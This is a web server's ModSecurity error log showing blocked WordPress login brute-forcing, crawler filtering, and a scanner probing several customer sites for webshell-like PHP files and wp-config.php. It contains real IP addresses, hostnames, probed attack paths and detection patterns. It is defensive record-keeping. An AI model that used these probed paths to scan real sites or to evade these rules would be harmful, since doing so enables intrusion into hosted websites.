[Tue May 26 19:05:37.584156 2026] [security2:error] [pid 6038:tid 6139] [remote 157.20.215.193:47894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.215.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhqVHA3ZmGrHHEr4qXnQAA5WQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:38.071795 2026] [security2:error] [pid 6038:tid 6213] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhqVHA3ZmGrHHEr4qXowAAALI"]
[Tue May 26 19:05:38.647165 2026] [security2:error] [pid 6038:tid 6146] [remote 149.18.50.19:43972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhqlHA3ZmGrHHEr4qXxAAAzGs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:39.665405 2026] [security2:error] [pid 6038:tid 6160] [remote 162.240.52.198:43966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhq1HA3ZmGrHHEr4qX1gAA2nk"]
[Tue May 26 19:05:39.892032 2026] [security2:error] [pid 6038:tid 6203] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhq1HA3ZmGrHHEr4qX3AAAAKg"]
[Tue May 26 19:05:40.421539 2026] [security2:error] [pid 6038:tid 6040] [remote 162.240.52.198:43966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhrFHA3ZmGrHHEr4qYAAAAigE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:40.899066 2026] [security2:error] [pid 6038:tid 6039] [remote 5.78.119.122:34842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWhrFHA3ZmGrHHEr4qYBwAA4wA"]
[Tue May 26 19:05:41.021773 2026] [security2:error] [pid 6038:tid 6225] [client 66.249.66.200:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.preetishah.com"] [uri "/index.php"] [unique_id "ahWhq1HA3ZmGrHHEr4qX8AAAAL4"]
[Tue May 26 19:05:41.911365 2026] [security2:error] [pid 6038:tid 6286] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhrVHA3ZmGrHHEr4qYGwAAAPs"]
[Tue May 26 19:05:42.599413 2026] [security2:error] [pid 6038:tid 6214] [client 47.128.47.10:65266] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWhrlHA3ZmGrHHEr4qYOwAAALM"]
[Tue May 26 19:05:43.552750 2026] [security2:error] [pid 6038:tid 6283] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhr1HA3ZmGrHHEr4qYRwAAAPg"]
[Tue May 26 19:05:44.983007 2026] [security2:error] [pid 6038:tid 6256] [client 173.239.240.58:52867] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWhsFHA3ZmGrHHEr4qYaQAAAN0"]
[Tue May 26 19:05:46.331236 2026] [security2:error] [pid 6038:tid 6179] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhsVHA3ZmGrHHEr4qYhwAAAJA"]
[Tue May 26 19:05:47.814184 2026] [security2:error] [pid 6038:tid 6214] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhs1HA3ZmGrHHEr4qYsAAAALM"]
[Tue May 26 19:05:49.450608 2026] [security2:error] [pid 6038:tid 6166] [remote 57.141.2.39:37425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWhtVHA3ZmGrHHEr4qY4QABAX8"]
[Tue May 26 19:05:50.047845 2026] [security2:error] [pid 6038:tid 6225] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhtVHA3ZmGrHHEr4qY6gAAAL4"]
[Tue May 26 19:05:50.310406 2026] [security2:error] [pid 6038:tid 6274] [client 47.128.40.250:13282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pstta.in"] [uri "/"] [unique_id "ahWhtlHA3ZmGrHHEr4qY_wAAAO8"]
[Tue May 26 19:05:50.751965 2026] [security2:error] [pid 6038:tid 6218] [client 45.33.14.197:39984] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.199.245"] [uri "/index.cgi"] [unique_id "ahWhtlHA3ZmGrHHEr4qZDgAAALc"]
[Tue May 26 19:05:53.246969 2026] [security2:error] [pid 6038:tid 6176] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhuFHA3ZmGrHHEr4qZRgAAAI0"]
[Tue May 26 19:05:54.623063 2026] [security2:error] [pid 6038:tid 6233] [client 202.76.137.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhulHA3ZmGrHHEr4qZfwAAAMY"]
[Tue May 26 19:05:54.910037 2026] [security2:error] [pid 6038:tid 6196] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhulHA3ZmGrHHEr4qZhgAAAKE"]
[Tue May 26 19:05:56.617851 2026] [security2:error] [pid 6038:tid 6218] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhvFHA3ZmGrHHEr4qZ1gAAALc"]
[Tue May 26 19:05:56.921995 2026] [security2:error] [pid 6038:tid 6271] [client 45.79.207.129:33438] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahWhvFHA3ZmGrHHEr4qZ-AAAAOw"]
[Tue May 26 19:05:56.985094 2026] [security2:error] [pid 6038:tid 6290] [client 74.7.230.38:39748] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.m2wealthadvisor.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWhvFHA3ZmGrHHEr4qZ_AAA_28"]
[Tue May 26 19:05:57.892803 2026] [security2:error] [pid 6038:tid 6151] [remote 213.171.208.62:60156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhvVHA3ZmGrHHEr4qaIgAA0HA"]
[Tue May 26 19:05:59.479207 2026] [security2:error] [pid 6038:tid 6208] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhv1HA3ZmGrHHEr4qaWQAAAK0"]
[Tue May 26 19:06:00.852677 2026] [security2:error] [pid 6038:tid 6279] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhwFHA3ZmGrHHEr4qakgAAAPQ"]
[Tue May 26 19:06:00.974880 2026] [security2:error] [pid 6038:tid 6271] [client 66.249.70.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhv1HA3ZmGrHHEr4qafQAAAOw"]
[Tue May 26 19:06:02.200696 2026] [security2:error] [pid 6038:tid 6210] [client 66.132.195.51:20314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.195.132.66.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "groupemf.azurmediatec.com"] [uri "/viewimage.php"] [unique_id "ahWhwlHA3ZmGrHHEr4qa5AAAAK8"]
[Tue May 26 19:06:03.018993 2026] [security2:error] [pid 6038:tid 6242] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhwlHA3ZmGrHHEr4qa-wAAAM8"]
[Tue May 26 19:06:04.264380 2026] [security2:error] [pid 6038:tid 6177] [client 114.119.138.251:58243] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acacia.org.in"] [uri "/favicon.ico"] [unique_id "ahWhxFHA3ZmGrHHEr4qbTAAAAI4"], referer: http://www.acacia.org.in/favicon.ico
[Tue May 26 19:06:05.091329 2026] [security2:error] [pid 6038:tid 6278] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhxFHA3ZmGrHHEr4qbWQAAAPM"]
[Tue May 26 19:06:07.969120 2026] [security2:error] [pid 6038:tid 6231] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhx1HA3ZmGrHHEr4qbnQAAAMQ"]
[Tue May 26 19:06:09.763858 2026] [security2:error] [pid 6038:tid 6274] [client 52.173.14.114:47603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWhyVHA3ZmGrHHEr4qb1QAAAO8"]
[Tue May 26 19:06:09.763989 2026] [security2:error] [pid 6038:tid 6274] [client 52.173.14.114:47603] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWhyVHA3ZmGrHHEr4qb1QAAAO8"]
[Tue May 26 19:06:09.883135 2026] [security2:error] [pid 6038:tid 6219] [client 52.173.14.114:56839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/166.php"] [unique_id "ahWhyVHA3ZmGrHHEr4qb2QAAALg"]
[Tue May 26 19:06:09.883264 2026] [security2:error] [pid 6038:tid 6219] [client 52.173.14.114:56839] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/166.php"] [unique_id "ahWhyVHA3ZmGrHHEr4qb2QAAALg"]
[Tue May 26 19:06:10.043507 2026] [security2:error] [pid 6038:tid 6281] [client 52.173.14.114:2994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/ups.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb4wAAAPY"]
[Tue May 26 19:06:10.043615 2026] [security2:error] [pid 6038:tid 6281] [client 52.173.14.114:2994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/ups.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb4wAAAPY"]
[Tue May 26 19:06:10.063773 2026] [security2:error] [pid 6038:tid 6182] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhyVHA3ZmGrHHEr4qb0QAAAJM"]
[Tue May 26 19:06:10.201488 2026] [security2:error] [pid 6038:tid 6208] [client 52.173.14.114:2689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/file5.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb5QAAAK0"]
[Tue May 26 19:06:10.201578 2026] [security2:error] [pid 6038:tid 6208] [client 52.173.14.114:2689] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/file5.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb5QAAAK0"]
[Tue May 26 19:06:10.327346 2026] [security2:error] [pid 6038:tid 6260] [client 52.173.14.114:51157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/file.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb6QAAAOE"]
[Tue May 26 19:06:10.327435 2026] [security2:error] [pid 6038:tid 6260] [client 52.173.14.114:51157] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/file.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb6QAAAOE"]
[Tue May 26 19:06:10.470444 2026] [security2:error] [pid 6038:tid 6188] [client 52.173.14.114:2991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/wp_filemanager.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb8AAAAJk"]
[Tue May 26 19:06:10.470552 2026] [security2:error] [pid 6038:tid 6188] [client 52.173.14.114:2991] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/wp_filemanager.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb8AAAAJk"]
[Tue May 26 19:06:10.619707 2026] [security2:error] [pid 6038:tid 6247] [client 52.173.14.114:56838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/file18.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb9wAAANQ"]
[Tue May 26 19:06:10.619834 2026] [security2:error] [pid 6038:tid 6247] [client 52.173.14.114:56838] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/file18.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb9wAAANQ"]
[Tue May 26 19:06:10.761069 2026] [security2:error] [pid 6038:tid 6190] [client 52.173.14.114:51192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.yourstorybag.com"] [uri "/hplfuns.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb-wAAAJs"]
[Tue May 26 19:06:10.761171 2026] [security2:error] [pid 6038:tid 6190] [client 52.173.14.114:51192] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.yourstorybag.com"] [uri "/hplfuns.php"] [unique_id "ahWhylHA3ZmGrHHEr4qb-wAAAJs"]
[Tue May 26 19:06:10.954151 2026] [security2:error] [pid 6038:tid 6242] [client 52.173.14.114:2706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.yourstorybag.com"] [uri "/wp-config.php"] [unique_id "ahWhylHA3ZmGrHHEr4qcAwAAAM8"]
[Tue May 26 19:06:10.954257 2026] [security2:error] [pid 6038:tid 6242] [client 52.173.14.114:2706] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "webmail.yourstorybag.com"] [uri "/wp-config.php"] [unique_id "ahWhylHA3ZmGrHHEr4qcAwAAAM8"]
[Tue May 26 19:06:12.141277 2026] [security2:error] [pid 6038:tid 6285] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhy1HA3ZmGrHHEr4qcHAAAAPo"]
[Tue May 26 19:06:13.355274 2026] [proxy:error] [pid 6038:tid 6171] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:06:13.355354 2026] [proxy_http:error] [pid 6038:tid 6171] [client 205.210.31.213:62664] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:06:13.356171 2026] [proxy:error] [pid 6038:tid 6171] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:06:13.356210 2026] [proxy_http:error] [pid 6038:tid 6171] [client 205.210.31.213:62664] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:06:13.460391 2026] [security2:error] [pid 6038:tid 6104] [remote 103.95.119.103:56080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhzVHA3ZmGrHHEr4qcQgABAEE"]
[Tue May 26 19:06:13.725756 2026] [security2:error] [pid 6038:tid 6174] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhzVHA3ZmGrHHEr4qcQQAAAIs"]
[Tue May 26 19:06:13.784856 2026] [security2:error] [pid 6038:tid 6103] [remote 211.23.68.235:6056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhzVHA3ZmGrHHEr4qcTQAAvEA"]
[Tue May 26 19:06:15.991105 2026] [security2:error] [pid 6038:tid 6170] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhz1HA3ZmGrHHEr4qcfAAAAIc"]
[Tue May 26 19:06:18.622813 2026] [security2:error] [pid 6038:tid 6171] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh0lHA3ZmGrHHEr4qcvwAAAIg"]
[Tue May 26 19:06:18.968329 2026] [security2:error] [pid 6038:tid 6122] [remote 46.224.234.158:51908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWh0lHA3ZmGrHHEr4qc1AAA_FM"]
[Tue May 26 19:06:20.856748 2026] [security2:error] [pid 6038:tid 6174] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh1FHA3ZmGrHHEr4qdBQAAAIs"]
[Tue May 26 19:06:20.884202 2026] [security2:error] [pid 6038:tid 6143] [remote 94.76.235.103:51858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWh1FHA3ZmGrHHEr4qdDwAA12g"]
